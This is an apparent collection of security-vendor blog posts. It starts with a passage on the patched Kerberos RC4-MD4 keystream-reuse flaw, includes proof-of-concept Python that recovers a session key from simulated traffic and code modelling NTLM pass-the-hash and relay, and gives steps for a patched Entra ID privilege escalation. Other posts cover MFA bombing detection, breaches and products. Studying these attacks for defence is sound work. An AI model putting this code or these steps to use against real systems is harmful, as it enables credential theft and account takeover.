As a result, the same keystream is used in different parts of the authentication exchange; most of the encrypted fields share the same RC4 keystream. The pre-authentication data contains an encrypted timestamp, so using knowledge of the current time the attacker can recover part of the keystream. If the attacker is lucky, the same keystream decrypts 4 of the 5 bytes of the TGT session key in the AS-REP. The last byte overlaps with the least significant part of the timestamp, the microseconds, which the attacker does not know. That last byte is brute-forced against an intercepted TGS-REQ of the victim, as outlined below.

ASN.1 Serialization Zoom In

ASN.1 DER is a tag-length-value encoding: each element carries a tag and a length before its value. The pre-authentication timestamp (PA-ENC-TS-ENC) is encoded this way. The structure is a SEQUENCE with two elements: the first a GeneralizedTime (KerberosTime) in Zulu format, the second an INTEGER holding the microseconds. Because each element has its own tag and length, we can identify 10 constant bytes that make up all the tags and lengths:

- 30: SEQUENCE tag
- 1A: length of the entire structure (26)
- A0: tag of the 1st element
- 11: element length (17)
- 18: GeneralizedTime tag
- 0F: value length (15)
- A1: tag of the 2nd element
- 05: element length (5)
- 02: INTEGER tag
- 03: value length (3)

To these 10 constant bytes we add the 15 bytes of the timestamp, which we guess to the second. The last three bytes are the microseconds, which are not efficient to guess. Finally, the 24 bytes of zeros that precede the encrypted part give us a total of 49 known plaintext bytes, and hence 49 bytes of keystream. The TGT session key is located at bytes 46 to 50 of the AS-REP's encrypted part, so its first four bytes fall inside the recovered keystream, and the last missing byte can be brute-forced against an intercepted service ticket request of the victim.

Patch

These vulnerabilities were closed by Microsoft in the September 2022 security update.
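The two sections above come down to one property: under RC4-MD4 every field encrypted with a given key is XORed with the same RC4 keystream, so known plaintext in one message (the pre-authentication timestamp) exposes the keystream that protects another (the session key in the AS-REP). The Python below is an added example, not the researchers' code or the Project Zero PoC. It models RC4-MD4 only as far as the article describes it (RC4 with no IV or key-usage separation, 24 zero bytes ahead of the plaintext, a 5-byte session key), DER-encodes PA-ENC-TS-ENC exactly as the byte list above, recovers the 49 known keystream bytes, reads 4 session-key bytes at the article's offset, and brute-forces the fifth against a message encrypted under the session key. The long-term key, timestamps, the AS-REP filler bytes and the stand-in TGS-REQ authenticator are all constructed; the real etype's key derivation and message layouts differ in details this demo does not need.

```python
"""Keystream reuse in an RC4-MD4 style Kerberos pre-authentication exchange.

Added example, not the researchers' or Project Zero's code. RC4-MD4 is modelled
only as far as the article describes it: RC4 with no IV/nonce and no key-usage
separation, 24 zero bytes ahead of the plaintext, and a 5-byte (40-bit) TGT
session key. Keys, timestamps and message bodies are constructed; the AS-REP
layout simply places the session key at bytes 46..50 as the article states.
"""
from datetime import datetime, timezone
from typing import Optional, Tuple

ZERO_PREFIX = bytes(24)                 # zeros preceding the encrypted part (per the article)
KEY_OFFSET = 45                         # 0-based offset of "bytes 46 to 50" in the AS-REP enc-part
KEY_LEN = 5                             # 40-bit RC4-MD4 session key
KNOWN_LEN = len(ZERO_PREFIX) + 10 + 15  # zeros + constant tags/lengths + KerberosTime = 49

DEMO_TIME = datetime(2022, 9, 13, 17, 45, 10, 123456, tzinfo=timezone.utc)  # constructed
DEMO_LONG_TERM_KEY = bytes.fromhex("0badc0ffee001122334455667788aabb")     # constructed stand-in for MD4(password)
DEMO_SESSION_KEY = bytes.fromhex("1337c0de42")                             # constructed 40-bit key


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Textbook RC4 (KSA + PRGA) producing n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Model of the weak etype: zero prefix, then plain RC4 XOR with no IV and no key usage."""
    data = ZERO_PREFIX + plaintext
    return xor(data, rc4_keystream(key, len(data)))


def pa_enc_ts_enc(ts: datetime) -> bytes:
    """DER-encode PA-ENC-TS-ENC ::= SEQUENCE { [0] KerberosTime, [1] INTEGER usec }.
    Microseconds are written as a fixed 3-byte INTEGER to match the constant
    10-byte tag/length layout the article lists (30 1A A0 11 18 0F ... A1 05 02 03)."""
    ktime = ts.strftime("%Y%m%d%H%M%SZ").encode()  # 15-byte GeneralizedTime, Zulu
    usec = ts.microsecond.to_bytes(3, "big")
    body = (b"\xa0" + bytes([2 + len(ktime)]) + b"\x18" + bytes([len(ktime)]) + ktime
            + b"\xa1\x05\x02\x03" + usec)
    return b"\x30" + bytes([len(body)]) + body


def recover_keystream(preauth_ct: bytes, guessed_time: datetime) -> bytes:
    """Known-plaintext recovery: zeros, tags/lengths and the timestamp to the second
    are predictable, so the first 49 keystream bytes fall out of the ciphertext.
    The 3 microsecond bytes at the end are unknown and are not used."""
    known = ZERO_PREFIX + pa_enc_ts_enc(guessed_time.replace(microsecond=0))
    return xor(preauth_ct[:KNOWN_LEN], known[:KNOWN_LEN])


def recover_session_key(preauth_ct: bytes, guessed_time: datetime,
                        asrep_ct: bytes, tgs_ct: bytes) -> Optional[bytes]:
    """Decrypt 4 of the 5 session-key bytes with the reused keystream, then brute-force
    the last byte against a captured message encrypted under the session key; the
    24-byte zero prefix makes a wrong candidate obvious."""
    ks = recover_keystream(preauth_ct, guessed_time)
    partial = xor(asrep_ct[KEY_OFFSET:KEY_OFFSET + 4], ks[KEY_OFFSET:KEY_OFFSET + 4])
    for last in range(256):
        cand = partial + bytes([last])
        if xor(tgs_ct[:len(ZERO_PREFIX)], rc4_keystream(cand, len(ZERO_PREFIX))) == ZERO_PREFIX:
            return cand
    return None


def simulate_exchange(long_term_key: bytes, session_key: bytes,
                      ts: datetime) -> Tuple[bytes, bytes, bytes]:
    """Constructed victim traffic: AS-REQ pre-auth and AS-REP enc-part under the user's
    long-term key, then a TGS-REQ authenticator stand-in under the session key."""
    preauth_ct = encrypt(long_term_key, pa_enc_ts_enc(ts))
    filler = b"\xaa" * (KEY_OFFSET - len(ZERO_PREFIX))  # constructed EncASRepPart bytes before the key
    asrep_ct = encrypt(long_term_key, filler + session_key + b"\xbb" * 32)
    tgs_ct = encrypt(session_key, pa_enc_ts_enc(ts))
    return preauth_ct, asrep_ct, tgs_ct


def demo() -> Tuple[bytes, Optional[bytes]]:
    preauth_ct, asrep_ct, tgs_ct = simulate_exchange(DEMO_LONG_TERM_KEY, DEMO_SESSION_KEY, DEMO_TIME)
    guessed = DEMO_TIME.replace(microsecond=0)  # the attacker knows the time only to the second
    return DEMO_SESSION_KEY, recover_session_key(preauth_ct, guessed, asrep_ct, tgs_ct)


if __name__ == "__main__":
    real, recovered = demo()
    print("real session key:", real.hex(), "recovered:", recovered.hex() if recovered else None)
```

The brute-force step costs at most 256 RC4 setups, which is why the article calls the last byte cheap while the full 40-bit key is not; with the page's real layout the attacker would verify candidates against the victim's intercepted TGS-REQ in the same way. Note that the `pa_enc_ts_enc` output reproduces the 28-byte structure from the list above byte for byte.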
The update disabled the RC4-MD4 (-128) encryption type along with the RC4-HMAC-OLD (-133) encryption type. Once patched, any AS-REQ or TGS-REQ that asks for one of these two encryption types receives an 'Unsupported encryption type' error (KDC_ERR_ETYPE_NOSUPP).

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33679

Additional Information

https://bugs.chromium.org/p/project-zero/issues/detail?id=2310&q=label%3ACVE-2022-33647 – analysis by James Forshaw

---
- Published: 2022-10-06
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/how-high-touch-renewed-cyber-insurance-policy/

The massive spike in ransomware attacks in 2021, up 105% worldwide according to SonicWall, left cyber insurance companies facing an exponential increase in claims at the end of last year. In response, insurers tightened their requirements this year, releasing a long list of specific conditions companies now need to meet in order to qualify for a policy. Among those conditions is the enforcement of multi-factor authentication (MFA) on resources across the hybrid environment, including cloud-based email, remote network access, and internal and external admin access. The stringent new requirements came as a surprise to many organizations, including High Touch Technologies, a Wichita, Kansas-based firm specializing in custom software and managed IT solutions for healthcare, manufacturing, and utilities companies based in America's heartland. “We found that the requirements had changed pretty dramatically,” says Hugh Christiansen, an enterprise solutions architect with High Touch. “In particular, we saw that MFA was being mandated not just for cloud services or applications but anything that had admin access.” Finding a way to enforce MFA across every type of admin access proved a challenge.
This is because, despite today’s focus on cloud services, most companies, High Touch included, still run a significant portion of their resources on-prem, and those resources cannot natively be protected with MFA because the authentication protocols they use (Kerberos, LDAP and NTLM) have no provision for a second factor. High Touch also discovered it had only 60 days to identify and implement a new solution in order to retain its cyber insurance policy. “I really didn’t want a multitude of different solutions to meet this particular compliance requirement,” says Christiansen. “I wanted one solution — one interface with a single vendor.” The company engaged a variety of suppliers and ran four pilots before finding that Silverfort was the only solution that met all of its criteria. Silverfort can help companies like High Touch meet the new MFA requirements because of how its technology works: when a user requests access to a resource, cloud or on-prem, the identity provider forwards the authentication to Silverfort for additional scrutiny. Silverfort’s AI-powered risk engine evaluates each request in real time and, when needed, sends an MFA prompt straight to the user. This matters most for the command-line tools admins use every day, such as PsExec, PowerShell and WMI. “We looked at some big names in the industry to help us meet the insurance requirements but Silverfort was the only one that could get it done for us,” says Christiansen. With time of the essence, High Touch was especially pleased that implementation was quick and painless: working closely with Silverfort customer success, the company moved from decision to rollout in less than 30 days. “In all my years of doing IT work, it was one of the quickest deployments I’ve ever seen, especially for a solution that’s so complex,” says Christiansen. “It was really amazing.”

Having successfully renewed its cyber insurance policy, the High Touch team turned its attention to fully utilizing Silverfort’s threat prevention capabilities. In addition to the ease of fine-tuning MFA policies, Christiansen was impressed that the solution could automatically discover and monitor service accounts, including blocking access when anomalous behavior is detected, all with minimal impact on the domain controllers. “Quite frankly, our EDRs are much more resource-intensive,” says Christiansen. “Silverfort is a high-impact, low-maintenance piece of the security puzzle.” Watch the full on-demand webinar here.

---
- Published: 2022-09-29
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/customer-case-study-preventing-ntlm-based-lateral-movement-with-silverfort/

Since its inception, the NTLM authentication protocol has been infamous for its low resilience against attackers seeking to abuse it for malicious access. NTLM ceased to be the default in Active Directory environments long ago, and many organizations now strive to restrict its use or ban it altogether, yet it is still supported and prevalent. In this post we recap NTLM’s security risks and look at how a leading manufacturer used a Silverfort access policy to stop nation-state attackers from using it for lateral movement.

Short Reminder: NTLM Security Gaps

NTLM Recap

NTLM is a challenge/response protocol: instead of sending the user’s password over the wire, the client proves that it knows it. After the client establishes a network connection, the server sends a random challenge; the client returns a response computed from that challenge, the username and domain name, and a one-way hash of the user’s password (the NT hash). The server, or the domain controller in the case of a domain account, recomputes the response from the stored hash and grants or denies access based on whether the two match.
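The exchange just described, modelled in code so that the two consequences discussed in this post are visible: the verifier needs only the hash (so the hash is password-equivalent), and nothing in the response identifies which server the client thought it was talking to (so a man in the middle can relay it). This is an added example, not Silverfort's code. It follows the NTLMv2 computation from MS-NLMP (NTOWFv2 and NTProofStr over HMAC-MD5) on constructed inputs: the NT hash, challenges, timestamp and the empty target-info blob are all made up for the demonstration, and the AV_PAIR details of real TargetInfo are left out.

```python
import hashlib
import hmac
import struct


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 per MS-NLMP: HMAC-MD5 keyed with the NT hash over UTF-16LE(UPPER(user) + domain).
    Note the input: the 16-byte NT hash, never the cleartext password."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, target_info: bytes, timestamp: int) -> bytes:
    """NtChallengeResponse = NTProofStr || temp, where
    temp = 0x01 0x01 Z(6) Time(8) ClientChallenge(8) Z(4) TargetInfo Z(4) and
    NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    temp = (b"\x01\x01" + bytes(6) + struct.pack("<Q", timestamp)
            + client_challenge + bytes(4) + target_info + bytes(4))
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def verify_ntlmv2(nt_hash: bytes, user: str, domain: str, server_challenge: bytes,
                  response: bytes) -> bool:
    """What the server/DC does: recompute NTProofStr from the stored hash and compare."""
    proof, temp = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo() -> dict:
    # Constructed data. NT_HASH is the widely published NT hash of "password"
    # (MD4 over UTF-16LE); it stands in both for what the DC stores and for what a
    # credential-dumping tool lifts out of LSASS.
    nt_hash = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    user, domain = "alice", "CORP"
    target_info = b""                       # AV_PAIRs omitted in this model
    srv_chal = bytes.fromhex("0123456789abcdef")
    cli_chal = bytes.fromhex("fedcba9876543210")
    t = 0x01D8C8F0A0B0C0D0                  # FILETIME-style timestamp, constructed

    # 1. Legitimate logon: the real client derives the hash from the password it knows.
    legit = ntlmv2_response(nt_hash, user, domain, srv_chal, cli_chal, target_info, t)
    # 2. Pass-the-hash: the attacker never learned the password, only nt_hash.
    #    The function does not care; the response is indistinguishable.
    pth = ntlmv2_response(nt_hash, user, domain, srv_chal, cli_chal, target_info, t)
    # 3. Relay: the attacker opens a connection to the real server, takes its challenge,
    #    hands that challenge to the victim client, and forwards the victim's response.
    #    The response carries no name of the server the victim believed it was reaching.
    victim_resp = ntlmv2_response(nt_hash, user, domain, srv_chal, cli_chal, target_info, t)
    # 4. A captured response replayed against a fresh challenge fails: the challenge is bound.
    fresh_chal = bytes.fromhex("1111111111111111")
    return {
        "legit": verify_ntlmv2(nt_hash, user, domain, srv_chal, legit),
        "pass_the_hash": verify_ntlmv2(nt_hash, user, domain, srv_chal, pth),
        "relayed": verify_ntlmv2(nt_hash, user, domain, srv_chal, victim_resp),
        "replayed": verify_ntlmv2(nt_hash, user, domain, fresh_chal, legit),
    }
```

In real deployments the TargetInfo blob can carry MsvAvTargetName and channel-binding (EPA) entries, and SMB and LDAP signing can be required; where servers enforce those, the response is bound to the intended service or TLS channel and the relay case above stops verifying. Absent such enforcement, the model above is the one attackers rely on.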
NTLM Built-In Weaknesses

NTLM has weaknesses that make it easier for threat actors to compromise:

Unsalted, password-equivalent hash: the NT hash is not salted, and the response is computed from the hash alone, so whoever holds the hash can authenticate without knowing the password. An attacker who retrieves a hash, and there are various ways to dump it from a machine’s memory, can access a target server and impersonate the user (pass-the-hash).

No server identity validation: the server validates the identity of the client, but the client never validates the identity of the server, which opens the door to man-in-the-middle and relay attacks.

Lack of Protection Against Compromise Scenarios

In addition, NTLM, like the other protocols in an Active Directory environment, has no native support for MFA or any other control that can detect and block a malicious authentication. So if a threat actor exploits the weaknesses above, the chances of blocking the attack are extremely low.

Silverfort’s Protection for NTLM: MFA and Block Access Policies

The Silverfort Unified Identity Protection platform monitors and protects all authentications in an organization’s environment. Silverfort is the first and only solution that can enforce MFA and conditional access policies on NTLM authentications. With Silverfort, identity and security teams can monitor and govern NTLM authentications and decide, based on operational considerations, whether to protect them with adaptive policies or ban the use of NTLM altogether.

Preventing a Lateral Movement Attack with an NTLM Authentication Block

In April 2022, a leading manufacturer and Silverfort customer was attacked by nation-state actors. The attackers’ initial target was another company’s factory, and their first step was to compromise its Wi-Fi network.
Through that network they also gained access to the laptops of several of the manufacturer’s employees who were visiting the factory at the time. Realizing these laptops belonged to a different company, the attackers pivoted and tried to use them as a beachhead into the manufacturer’s internal network. In the course of these attempts they compromised one employee’s credentials and tried to log in to servers in the manufacturer’s network over NTLM. Before the attack, the company had configured a Silverfort policy that blocks any NTLM login from workstations to servers in its domain. That access policy prevented the attackers from using the stolen credentials to move laterally within the manufacturer’s environment, and ultimately stopped the attack. To learn more about this attempted attack and Silverfort’s proactive threat detection and prevention, download the customer success case study here.

---
- Published: 2022-09-22
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/uber-breach-key-takeaways-why-mfa-service-account-protection-pam-must-work-together-to-protect-against-compromised-credentials/

The recent Uber breach should be a wake-up call to rethink how identity protection is implemented and practiced in today’s enterprise environments. The most striking aspect of the breach is not just the role compromised credentials played, but the failure of the identity protection measures in place to prevent the malicious use of those credentials. The attack is a perfect illustration of why identity is the most prominent attack vector today: inherent gaps in current MFA and PAM solutions. In this article we examine these gaps and discuss Silverfort’s unified approach to identity protection, a purpose-built platform designed to thwart exactly these threats.
Attack Flow: Compromised Credentials All Along the Way

The attackers obtained VPN credentials from a third-party contractor. Uber posted that “It is likely that the attacker purchased the contractor’s Uber corporate password on the dark web, after the contractor’s personal device had been infected with malware, exposing those credentials.” With these credentials in hand, the attackers carried out an MFA bombing attack followed by a direct call to the contractor in which they impersonated support staff. The contractor approved the MFA notification, granting the attackers access to Uber’s internal environment. Once inside, the attacker scanned the network until finding a network share which, according to the attacker’s own tweet, contained PowerShell scripts. One of the scripts contained the username and password of an admin user of the PAM solution. With these, the attacker accessed the PAM and extracted secrets for various systems, including DA, Duo, OneLogin, AWS and Google Workspace.

Important note: being embedded in a script, this account was most probably a service account created to let the script perform the authentications its task required. Hardcoding such credentials in scripts is common practice, but it means they cannot be vaulted or subjected to PAM password rotation, which leaves them exposed.

From there the attackers accessed multiple resources at will, including posting an explicit photo on an internal message board.

Gaps That Enabled the Attack

Analyzing the security measures in place, we see a variety of weaknesses across the MFA and PAM solutions, as well as in service account protection, that allowed this attack to succeed.
Let’s examine each one.

MFA: Limited Protection and Partial Coverage

Inability to detect risky authentication: the MFA solution in place could not treat a stream of continuously denied access attempts as a risk indicator, so the contractor kept being prompted over and over.

Inability to protect access to network shares: despite its simple user experience, opening a network share (from the UI or the command line) triggers a background authentication over the SMB (CIFS) protocol. Since this service does not natively support MFA, access to the network share was unprotected.

PAM: Single Point of Failure When Deployed as a Standalone Protection

Unprotected access: there was no security control on the initial login to the PAM interface. Requiring MFA for that login would have denied the attackers any use of the compromised credentials.

Single point of failure: once the attackers had breached the PAM and begun extracting data, nothing stood in their way. A sound security architecture layers protections around privileged access so that even if the PAM layer is breached, other controls still stop the attackers’ advance.

Service Accounts: Lack of Monitoring and Protection

Inability to vault and rotate passwords: as explained above, service account credentials hardcoded in a script cannot be vaulted and rotated, since doing so would likely break the processes the script performs. In this case the consequence was critical, because the exposure of these credentials gave the attackers direct access to the PAM.

The Silverfort Way: Adaptive MFA, Service Account Protection and PAM Hardening

Silverfort’s Unified Identity Protection platform extends MFA to any user, system or resource, including those that could never be protected before, and enforces adaptive MFA policies that respond to detected risks.
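The “continuously denied access attempts” risk indicator that the gap analysis above says was missing, as detection logic run over constructed push-MFA log lines. This is an added example, not Silverfort’s code: the five-denial threshold, the ten-minute window and the log format are assumptions chosen for the demonstration, and the third column of each line is the response the user would give if prompted.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed push-MFA log: "<UTC time> <user> <response the user gives if prompted>".
# contractor01 is being bombed; alice denies twice and then approves a real login;
# carol's early denials fall outside the window; bob is a normal approval.
SAMPLE_LOG = """\
2022-09-15T02:01:10Z contractor01 denied
2022-09-15T02:01:40Z contractor01 denied
2022-09-15T02:02:05Z contractor01 denied
2022-09-15T02:02:30Z contractor01 denied
2022-09-15T02:03:00Z contractor01 denied
2022-09-15T02:03:20Z contractor01 denied
2022-09-15T02:04:00Z contractor01 denied
2022-09-15T02:05:00Z alice denied
2022-09-15T02:05:30Z alice denied
2022-09-15T02:06:00Z alice approved
2022-09-15T02:07:00Z bob approved
2022-09-15T01:00:00Z carol denied
2022-09-15T01:01:00Z carol denied
2022-09-15T01:02:00Z carol denied
2022-09-15T02:30:00Z carol denied
2022-09-15T02:31:00Z carol denied
2022-09-15T02:20:00Z alice denied
2022-09-15T02:21:00Z alice denied
2022-09-15T02:22:00Z alice denied
2022-09-15T02:23:00Z alice denied
"""

THRESHOLD = 5                    # consecutive denials before prompts are suppressed (assumed)
WINDOW = timedelta(minutes=10)   # denials older than this no longer count (assumed)


def parse(line: str) -> tuple:
    stamp, user, response = line.split()
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"), user, response


def evaluate(lines, threshold: int = THRESHOLD, window: timedelta = WINDOW):
    """Decide, per login attempt, whether to send the push ('prompt') or swallow it
    ('suppress'). Returns the per-attempt decisions and the users flagged as targeted."""
    recent = defaultdict(deque)     # user -> timestamps of consecutive denials inside the window
    decisions, flagged = [], set()
    for ts, user, response in sorted(parse(l) for l in lines if l.strip()):
        q = recent[user]
        while q and ts - q[0] > window:   # forget denials that have aged out
            q.popleft()
        if len(q) >= threshold:
            # The attempt is still recorded for the SOC, but the user never sees a prompt
            # and so cannot be worn down into approving it.
            decisions.append((ts, user, response, "suppress"))
            flagged.add(user)
            continue
        decisions.append((ts, user, response, "prompt"))
        if response == "denied":
            q.append(ts)
        else:                              # an approval ends the streak
            q.clear()
    return decisions, flagged


if __name__ == "__main__":
    for ts, user, response, decision in evaluate(SAMPLE_LOG.splitlines())[0]:
        print(ts.isoformat(), user, response, decision)
```

Two design points carry over to any real implementation: the streak is reset by an approval, not by time alone, because a bombed user who finally approves is exactly the case that must stay visible, and the suppressed attempts are kept in the output so the flagged user’s risk can be raised and the events forwarded to the SIEM rather than silently dropped.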
In addition, Silverfort places a virtual fence around service accounts to prevent their misuse by threat actors. Working alongside a PAM solution, Silverfort can prevent Uber-like breaches through the following capabilities:

MFA bombing mitigation: Silverfort policies can be configured to stop sending MFA prompts to a user after a sequence of denied access attempts. The attempts are still logged and visible in the Silverfort console for the security team to investigate, but the user no longer sees them and so is never tempted to approve one. Read more on Silverfort’s MFA bombing mitigation in this blog.

MFA protection for network shares: Silverfort can require MFA for network share access. This is achieved through Silverfort’s integration with Active Directory, which lets every access attempt be analyzed regardless of the authentication protocol or service used. It adds another layer of protection and keeps attackers out of such folders even when they hold compromised credentials.

Dedicated service account protection: Silverfort automates the discovery, activity monitoring, risk analysis and access policy creation for all service accounts in the environment, so any deviation of a service account from its normal activity can trigger a policy that blocks its access to the targeted resource.

MFA protection for PAM access: Silverfort can enforce an MFA policy on access to the PAM console itself, safeguarding it from malicious access like the one in the Uber breach.

MFA or block access for privileged accounts used from a non-PAM source: Silverfort can enforce a policy that either requires MFA or blocks access outright whenever a privileged account (i.e. one stored in the PAM vault) attempts to access a resource from any source other than the PAM machine itself.
Such a policy directly mitigates the scenario in which PAM contents have been extracted by attackers who then try to use the newly compromised privileged credentials to reach sensitive resources. The following diagram shows the flow of the attack and the stages at which Silverfort would have stopped it:

Conclusion

Security stakeholders must realistically assume that credentials will eventually be compromised. Given that, the ultimate benchmark for the identity protection layer of the enterprise security stack is how resilient it is to exactly that scenario. As this article has shown, traditional MFA solutions and standalone PAM deployments fail to provide the level of protection enterprises need today. Silverfort’s Unified Identity Protection platform is the first to combine adaptive MFA, automated service account protection and PAM hardening in a single solution built to confront today’s identity threat landscape. Click here to learn more.

---
- Published: 2022-09-20
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/identitys-role-as-a-strategic-risk-mitigation-tool/

For large organizations operating in an uncertain world, a big-picture view of risk is crucial. Understanding and addressing the array of threats to operations brings stability to revenues, reputation, customer relationships and more. Because this means considering everything from macro-economic trends and geopolitics to potential natural disasters, there was a time when technology risk had to fight for its place at the board table. Thankfully that is no longer the case, with the rapid rise of cybersecurity to the top of the agenda forcing the issue. The key thing to remember is that these conversations are held by a set of stakeholders whose primary lens is not technical.
By its very nature, a Risk Committee must filter a multitude of issues and translate them down to one base factor: their impact on the organization in question. Because of this, cyber risk too must be boiled down to its simplest, most non-technical constituent parts, not always an easy task for a space defined by complexity and change. First, scenarios must be gamed and their likely business impact assessed. Only once this is understood can solutions be put forward and, crucially, their impact on resources calculated to determine whether the outlay is warranted. While this is somewhat simplified, understanding this calculus is central to approaching risk strategically. No CISO or CIO is given a blank cheque and, with the attack surface in constant flux, this process helps them work out where to place their chips for greatest impact. This equation is one of the reasons I joined Silverfort: I believe identity security can play a huge part in improving it. Identity has been abused by attackers to move around environments for many years, a central route leading to everything from ransomware attacks to data breaches. Having visibility of this and closing it down with MFA greatly reduces exposure to the root cause of many attacks. In addition, by unifying a disparate array of identity technologies, Silverfort does this in a way that helps minimize resource outlay. Both sides of the equation work. As someone who has been involved in technology for 40 years, I have seen many changes first-hand. Driven by technological innovation, I believe we are seeing identity security start to own its role in strategic risk mitigation, something I look forward to helping organizations achieve with Silverfort.
---
- Published: 2022-09-01
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/privilege-escalation-in-azure-ad/

Privilege escalation attacks are among the most pressing issues for security teams worldwide and are commonly used as part of lateral movement. Threat actors know that privileged accounts are harder to compromise because they are typically monitored and protected, so they use privilege escalation flaws to take control of less-monitored accounts and then grant themselves a high level of access, all while staying under the security team’s radar. In today’s hybrid environment, enterprises are increasingly moving sensitive resources to SaaS apps, and Azure Active Directory (now Entra ID) is one of the leading cloud identity providers that let enterprises centrally manage access to such apps. We recently discovered a privilege escalation issue in Entra ID (formerly Azure AD) that allowed an attacker to bypass a password-reset safeguard, enabling lower-level admins to become fully privileged ones. We reported it to the Microsoft Security Response Center (MSRC), which validated the issue and applied a fix. While it no longer poses a risk to Entra ID users, we believe the wider security community can benefit from our analysis and findings.

Technical Analysis

Entra ID’s privileged role system works as a hierarchy that prevents lower-privileged admins from resetting the passwords of higher-privileged admins. Beyond the operational logic, this safeguards against a compromised lower-privileged admin account being used to take over accounts with higher privileges. The safeguard applies when the user’s role assignment is either “eligible” or “active”. However, Entra ID also lets a role be assigned for future use, i.e. the higher-level privileges are granted at a predefined date and time. We discovered that in this case the password safeguard did not apply. This exposed Entra ID to the following scenario:

Initial compromise: the attacker compromises an admin account with low privileges.

Future role assignment discovery: the attacker scans Entra ID for accounts scheduled to become highly privileged admins in the future.

Password reset: the attacker resets the passwords of these accounts, compromising them before the role assignment takes effect. Ideally the reset happens as close as possible to the time of the role change.

Privilege escalation: the role change takes place, giving the attacker full control of an active, highly privileged admin account.

Let’s go over these stages one by one.

Initial Compromise

For this analysis, assume the compromise has already happened: the attacker controls the account of “Shay Katz”, which has an active assignment of “Helpdesk Administrator”.

Screenshot 1: Shay Katz’s assigned roles

The following table, taken from the Entra ID built-in roles page, shows the password reset rights of various roles. “Helpdesk Administrator” cannot reset the passwords of the “Authentication Administrator” and “Password Administrator” roles.

Screenshot 2: Entra ID password reset permissions table

The attacker is now logged in to Entra ID as “Shay Katz”.

Future Role Assignment Discovery

Before Microsoft’s fix, a less privileged admin had two ways to discover future admin assignments:

Option A: through the Entra ID portal, by checking the “pending requests” page for a future role assignment of a higher-tier admin.

Option B: via a script against the Microsoft Graph API:
a) Required permissions to list scheduled role eligibility requests: ReadWrite.AzureAD, plus a permission from the following list: DeviceManagementApps.Read.All, DeviceManagementApps.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All, User.Read.All, User.ReadBasic.All, User.ReadWrite.All.
b) Query https://graph.microsoft.com/beta/roleManagement/directory/roleEligibilityScheduleRequests to get the scheduled requests, and keep those with status = ‘Provisioned’ AND scheduleInfo start time > current time AND roleDefinitionId in the list of protected role IDs.
c) Query https://graph.microsoft.com/beta/users?$select=displayName,id to resolve each request’s principalId to the user’s display name.

Using the portal (option A), the attacker finds a sample test account that currently has no “Active” or “Eligible” role assignments.

Screenshot 3: ‘Test’ account without ‘eligible’ or ‘active’ assignments

However, the “Request time” and “Start time” fields show that this test account has a pending request to be added as Global Administrator in the future.

Screenshot 4: Pending request for the test account to become Global Administrator

The attacker has found a worthy target: a low-privileged account with a future privileged role assignment. We can move to the next stage.

Password Reset

The attacker resets the test account’s password in the Entra ID portal:

Screenshot 5: Password reset for the test account

Privilege Escalation

Mission accomplished. When the defined start time arrives, the test account is upgraded to Global Administrator, and the attacker has full control.

Microsoft’s Fix

Microsoft addressed the issue with the following controls:

A low-privileged admin can no longer see pending requests in the portal.

An attempt to reset the password of an account with a future privileged role assignment now returns an error (normally, when you are not allowed to reset a password, the reset button is simply disabled).

Conclusion

As stated, Microsoft has fixed this issue, so the technique is no longer effective. Note, however, that issues of this kind in Just-in-Time access safeguards are known to attract attackers: here there was a gap between the assignment of a privilege and the enablement of the security measure built to protect it. As enterprises become more cloud-oriented, threat actors’ appetite for such weaknesses in SaaS management infrastructure grows. We are pleased to have had the opportunity to close an exposure in the attack surface and thank Microsoft for its efficient and rapid response.

---
- Published: 2022-08-17
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/cisco-breach-a-painful-reminder-of-the-lateral-movement-blind-spot/

No one is immune to breaches, as demonstrated last week when the networking giant Cisco reported a breach of its internal environment. Although reports indicate no significant harm was done, the breach is an opportunity to reflect on the critical gaps in today’s identity protection landscape at two key stages of an attack: initial access and the lateral movement that follows. The most conspicuous gap is the lack of real-time MFA protection inside the internal environment: once attackers gain initial access to a machine and compromise user credentials, they can move laterally unencumbered. Silverfort addresses these gaps with its Unified Identity Protection platform, which extends MFA protection to any user, system or environment, including those that have never had it before. The following summary is based on excerpts from the attack analysis published by Cisco’s Talos threat intelligence team and focuses on the stages that illustrate the identity protection gaps and the corresponding security measures Silverfort provides.
Stage 1: Initial Access

The Attack: Employing MFA fatigue to lure users into allowing malicious access

“After obtaining the user’s credentials, the attacker attempted to bypass MFA using a variety of techniques, including MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving.”

The Gap: Static MFA that doesn’t respond dynamically to targeted activity

